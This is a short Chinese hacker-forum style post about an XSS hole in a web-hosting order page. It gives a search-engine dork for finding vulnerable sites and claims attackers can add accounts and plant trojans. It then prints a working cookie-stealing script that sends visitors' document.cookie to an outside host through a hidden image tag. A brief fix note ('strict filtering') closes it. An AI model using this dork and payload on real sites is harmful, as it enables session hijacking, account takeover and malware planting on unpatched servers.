google or baidu 搜索 inurl:user/order.asp?type=虚拟主机
可以加帐号 可以后台挂马 等等等等
XXS 偷取cookie代码
<script>document.write('<img src="http://www.c3389.com /xss.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>
不多说了 很纠结。
BY :cy
修复:严格过滤
星外已经更新过了 有个别站可能没更新。